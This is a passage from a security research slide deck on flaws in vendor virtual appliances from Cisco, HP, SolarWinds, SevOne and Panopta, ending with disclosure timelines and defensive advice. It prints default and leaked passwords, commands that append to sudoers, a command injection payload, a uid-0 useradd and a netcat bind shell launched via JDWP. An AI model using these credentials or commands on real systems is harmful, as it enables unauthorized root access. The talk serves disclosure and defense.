  • 51. Undocumented Accounts • Cisco MSE (Mobility Services Engine) Reference: http://www.cisco.com/c/en/us/support/docs/wireless/mobility-services-engine/113462-mse-ha-config-dg-00.html
  • 52. Undocumented Accounts • Two user accounts on this appliance – root – oracle (!?) • Upon install, root’s password is set by admin – oracle is untouched
  • 53. Undocumented Accounts • Cracking the password hash was unsuccessful – They must have set the password during install
  • 54. Undocumented Accounts • We search the filesystem and finally… BINGO
  • 55. Undocumented Accounts • $ ssh oracle@cisco-mse – oracle@cisco-mse's password: [XmpDba123] • -bash-3.2$ id – uid=440(oracle) gid=201(xmpdba) groups=200(oinstall),201(xmpdba),202(xmpoper) context=user_u:system_r:unconfined_t:s0
  • 56. Undocumented Accounts • We have user.. but we want root • Let’s take a look at the post-install log file • Uh, they SUID root copies of chmod / chown – I think we can work with that!
  • 57. Undocumented Accounts • -bash-3.2$ ls -al /etc/sudoers – -r--r----- 1 root root 4789 Mar 6 00:27 /etc/sudoers • -bash-3.2$ – /opt/mse/framework/bin/setbackupown oracle /etc/sudoers – /opt/mse/framework/bin/setbackupmod 644 /etc/sudoers
  • 58. Undocumented Accounts • -bash-3.2$ ls -al /etc/sudoers – -rw-r--r-- 1 oracle root 4789 Mar 6 00:27 /etc/sudoers • Now that’s more like it 
  • 59. Undocumented Accounts • -bash-3.2$ echo "oracle ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers • -bash-3.2$ sudo bash – sudo: /etc/sudoers is mode 0644, should be 0440 – sudo: no valid sudoers sources found, quitting • Ok, ok, let’s clean up after ourselves..
  • 60. Undocumented Accounts • Ok, ok, let’s clean up after ourselves • -bash-3.2$ – /opt/mse/framework/bin/setbackupown root /etc/sudoers – /opt/mse/framework/bin/setbackupmod 440 /etc/sudoers
  • 61. Undocumented Accounts • -bash-3.2$ sudo bash • bash-3.2# id – uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6( disk),10(wheel) context=user_u:system_r:unconfined_t:s0
  • 62. Undocumented Accounts • HP Enterprise Maps Reference: https://ssl.www8.hp.com/us/en/ssl/dlc/secure_software.html?prodNumber=H7P56BAE&siebelid=7820
  • 63. Undocumented Accounts • Documentation says use the vagrant account • But let’s take a look at the filesystem – In /etc/shadow we find another enabled user • So, if we’re able to crack this password… Reference: Virtual_Appliance_Letter_H7P56-88003.pdf
  • 64. Undocumented Accounts • And SSHD runs by default – And has remote root login enabled (!?) • Why would an undocumented user need to be allowed to remote into the box?
  • 65.
  • 66. Undocumented Accounts • $ ssh root@mapserver – root@mapserver’s password: [hpdemo] – […..] – This console does not provide access to Enterprise Maps. Use your web browser! • root@hpdemo:~# id – uid=0(root) gid=0(root) groups=0(root)
  • 67. Undocumented Accounts • Due to extremely poor security, it’s questionable if it was just a one-off demo • But it was concluded a functioning appliance – Contains a license that can be renewed – It receives security updates from HP – There have been public bugs in previous versions Reference: https://packetstormsecurity.com/files/127239/HP-Enterprise-Maps-1.00-Authenticated-XXE-Injection.html
  • 68. Undocumented Accounts • I sent this bug to ZDI (acquired by HP in 2010) – They offered me 600 points (not cash) • I thought this must be a mistake, but it wasn’t Reference: http://www.zerodayinitiative.com/about/benefits/
  • 69. Silent Patches • SevOne – NMS (Network Management System)
  • 70. Silent Patches • Found an undocumented account • $ ssh cmcdr@sevone – Password: [cmcdr] • [cmcdr@SevOne:/] [S1V: 5.3.6.0] [04:04:55] $
  • 71. Silent Patches • Found a juicy looking SUID binary • $ ls -al /usr/bin/aslookup – -r-s--x--x 1 root bin 12752 Mar 26 2013 /usr/bin/aslookup • $ /usr/bin/aslookup `perl -e 'print "B" x 1023'` – *** buffer overflow detected ***: /usr/bin/aslookup terminated
  • 72. Silent Patches • If we search for cmcdr account • But the URL has been removed…
  • 74. Silent Patches • The latest for public download was v5.3.6 – But this was fixed in v5.3.8 • The perks of being a customer I guess
  • 75. Command Injection • SolarWinds Log and Event Manager • Runs SSH server on port 32022 – Default creds are cmc:password Reference: http://www.solarwinds.com/log-event-manager.aspx
  • 76. Command Injection • cmc::acm# ping – Enter an IP address or hostname to ping: `bash>&2` – […] – cmc@swi-lem:/usr/local/contego$ id • uid=1001(cmc) gid=1000(trigeo) groups=1000(trigeo),4(adm),24(cdrom),25(floppy),104 (postgres),105(snort),1002(dbadmin)
  • 77. Command Injection • Mgrconfig is the main cmc interface – /usr/local/contego/scripts/mgrconfig.pl • It calls various shell scripts to implement cmds – contegocontrol.sh is writable by the cmc user • AND this script is called via sudo – cmc ALL=(ALL) NOPASSWD: /usr/local/contego/scripts/*.sh, […]
  • 78. Command Injection • If we add something useful to contegocontrol – echo "ALL ALL=NOPASSWD: /bin/bash" >> /etc/sudoers – And issue one of the cmds which trigger the script • cmc@swi-lem:/usr/local/contego$ sudo bash – /usr/local/contego # id • uid=0(root) gid=0(root) groups=0(root)
  • 79. Format String Bug • SolarWinds Log and Event Manager – cmc::acm# ping • Enter an IP address or hostname to ping: %p • [NO] Ping NOT received from 7f9830 • Although this CLI was written in Perl.. – You might want to give that 2005 paper a read Reference: http://www.securityfocus.com/archive/1/418460/30/0/threaded
  • 80. Root password? • SolarWinds LEM & Others References: http://knowledgebase.solarwinds.com/kb/questions/4921/LEM+Appliance+Security+Information+for+v5.6+and+Later https://thwack.solarwinds.com/community/solarwinds-community/product-blog/blog/2013/09/03/what-were- working-on--log-and-event-manager-lem https://thwack.solarwinds.com/thread/44161 https://thwack.solarwinds.com/thread/55095
  • 81. Crazy SUID Binaries • Cisco Prime Infrastructure – “Simplified Management from Branch to DataCenter” • ade # cat suid.log | wc -l – 67
  • 82. Crazy SUID Binaries • ade # cat suid.log | grep -i shell – /opt/CSCOlumos/bin/runShellCommand – /opt/CSCOlumos/bin/runShellAsRoot
  • 83. Crazy SUID Binaries Reference: /opt/CSCOlumos/bin/runShellAsRoot
  • 84. Crazy SUID Binaries • $ /opt/CSCOlumos/bin/runShellAsRoot – Segmentation fault (core dumped) • They didn’t even check if given an argument
  • 85.
  • 86. Crazy SUID Binaries • So let’s give it an argument! • $ cat /tmp/test – id • $ /opt/CSCOlumos/bin/runShellAsRoot /tmp/test – uid=0(root) gid=0(root) groups=502(cisco)
  • 87. Crazy SUID Binaries • What about that runShellCommand program? • $ /opt/CSCOlumos/bin/runShellCommand id – String obtained on concatenation is 2 id – uid=0(root) gid=0(root) groups=502(cisco)
  • 88. Crazy SUID Binaries • Gotta give them credit though – It looks like they really stepped up security here
  • 89. Crazy SUID Binaries • Ooops! • $ /opt/CSCOlumos/bin/runShellCommand /usr/sbin/useradd -o -u 0 -g 0 -p 123456 root2 – String obtained on concatenation is 10 /usr/sbin/useradd -o -u 0 -g 0 -p 123456 root2 • $ tail -1 /etc/passwd – root2:x:0:0::/home/root2:/bin/bash
  • 90. Crazy SUID Binaries + Remote • Cisco Prime Collaboration Assurance Reference: http://www.cisco.com/c/en/us/products/cloud-systems-management/prime-collaboration/index.html
  • 91. Crazy SUID Binaries + Remote • Two accounts on the system – Root password is set upon install – Cmuser password is only reset only upon login • Default password is also cmuser • Corner-case: setup without full configuration – So this isn’t widely exploitable, but the case study is noteworthy
  • 92. Crazy SUID Binaries + Remote • Locally, we see an interesting SUID binary – /opt/system/bin/firewall • Obviously controls the firewall rules
  • 93. Crazy SUID Binaries + Remote • Also, there’s an interesting server currently unexposed remotely due to the firewall – tcp 0 0 0.0.0.0:8010 0.0.0.0:* LISTEN 5637/emsam_perfmonengine • Turns out to be a Java Debug Server – Wasn’t this hacked into pieces before?
  • 94. Crazy SUID Binaries + Remote Reference: http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.html
  • 95. Crazy SUID Binaries + Remote • So maybe we can.. turn the firewall off? – [cmuser@cpca ~]$ /opt/system/bin/firewall -v -c • Clearing the firewall
  • 96. Crazy SUID Binaries + Remote • $ python jdwp-shellifier.py -t cpca -p 8010 --cmd "/home/cmuser/nc -l -p 5555 -e /bin/bash" – [+] Targeting 'cpca:8010' – [+] Reading settings for 'Java HotSpot(TM) 64-Bit Server VM - 1.6.0_81' – ….. – [+] Runtime.getRuntime() returned context id:0x9d2 – [+] found Runtime.exec(): id=4ba62af8 – [+] Runtime.exec() successful, retId=9d3 – [!] Command successfully executed
  • 97. Crazy SUID Binaries + Remote • $ nc cpca 5555 – id – uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6 (disk),10(wheel)
  • 98.
  • 99. Crazy SUID Binaries + Remote • There are many more SUID binaries on the appliance – firewall was just the most useful today • And many services likely to have bugs and default logins which never get changed – Hawtio web console (admin:admin) @ port 8161
  • 100. Password Litter • Panopta OnSight • Supported by CloudFlare – “[..] provides advanced server monitoring and outage management services to both enterprises and SMBs” Reference: https://www.cloudflare.com/apps/panopta Image: https://twitter.com/panopta
  • 101. Password Litter • Good job generating random credentials
  • 102. Password Litter • But, they forgot to remove the .bash_history – Which just so happened to contain a typo 
  • 103. Password Litter • $ ssh panopta.admin@pan-onsight – panopta.admin@ pan-onsight's password: [rb2svin9bwx7] • [….] • panopta.admin@onsight:~$
  • 104.
  • 105. Password Litter • panopta.admin@onsight:~$ sudo bash – [sudo] password for panopta.admin: [same pass] • root@onsight:~# id – uid=0(root) gid=0(root) groups=0(root)
  • 106. Password Litter • Wait, wait.. – Does that mean they’re keeping static passwords for users other than the customer’s admin account?
  • 107. Bootloader Access • Sophos Web Appliance Proxy Reference: /grub/menu.lst
  • 109. Bootloader Access • Again, nobody (at Sophos) really cares about the boot password – But, they should take note of proper file deletion
  • 110. Agenda I. Introduction II. Public Examples III. Image Analysis IV. Newer Bugs I. (un)documented Accounts II. Misc Bugs III. Password Litter IV. Bootloader Access V. Conclusion
  • 112. Brief Disclosure Timelines • SolarWinds – We’ll send our pgp key soon! fixed in ~5 months • EMC – fixed the bug in just over a month • Panopta – noted “patched potential security vulnerability” • Cisco (Prime Infrastructure) – released a private advisory after several months
  • 113. Brief Disclosure Timelines • VMware – Contacted me days before initial disclosure (9/26) – I sent them full details and haven’t heard back • SolarWinds – Fixed command injection on 09/01/2015 • Cisco (Mobility Services Engine) – Fixed undocumented account / PE on 11/04/2015 Reference: http://www.solarwinds.com/documentation/lem/docs/releasenotes/releasenotes.htm
  • 114. SecuriTeam Secure Disclosure • Many of these bugs were fixed through the SSD program at Beyond Security • More info – http://www.beyondsecurity.com/ssd.html
  • 115. Playing Defense • Clean it up before you ship it! – Don’t leave passwords in plain text to all users – Don’t leave crazy SUID binaries on boxes – Nonsense is shipping .ssh and .vim directories • Stop thinking it’s OK to have users on the system with passwords unknown to customers
  • 116. Playing Defense • Firewalling services is a great practice – (typically) There’s no point in auditing a service only accessible to localhost • Make users set all passwords or generate random ones for them upon install – Generating one for all the clones is not enough – Setting them to “password” is worst
  • 117. Playing Defense • Blacklisting users from remote access – Cisco Prime Collaboration Deployment • We’re able to login locally, but no SSH
  • 118. Solutions • Don’t mix demos and trials – This leads to bad security assumptions • Don’t ship the master development VM – Separate dev and shipping images • Checklist of “must not haves” for each VM – Most of the issues likely wouldn’t be found with code review
  • 119. Must Not Haves • Accounts – default passwords – undocumented (document them!) • Files – unencrypted passwords in logs – containing sensitive data (history, db, etc) • Local System – world-executable & SUID – world-writable scripts
  • 120. Must Not Haves • Services – Locally-meant, but listening on the network – Using different authentication systems • Assumptions – “This is only a demo or trial, not for production” – “I can hide this private key in this hidden folder” – “Only an admin can execute this script” – These can be invalidated via code churn / updates
  • 121. Esoteric Thoughts • Lots of installation collateral shipped – Eg. backup, restore, /install directories • Vendor services – Helpers listening on local and network interfaces – Think about “support” services / remote access • Read the documentation – Can be the difference between a bug and technically a feature
  • 122. Esoteric Thoughts • Forensics would be a game changer here – Professional suites are pretty expensive, but… – “We’re deleted all the sensitive files, boss”
  • 123. Things are heating up Reference: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150625-ironport
  • 124. Conclusion • This area is still largely unexplored • They’re only going to become more prevalent – More vendors will start converting metal -> bits – It’s cheaper and datacenters rule these days • And there’s a lot more work to do – Getting access to these is one hurdle (eg. FireEye) – The vendor (properly) fixing the bugs is another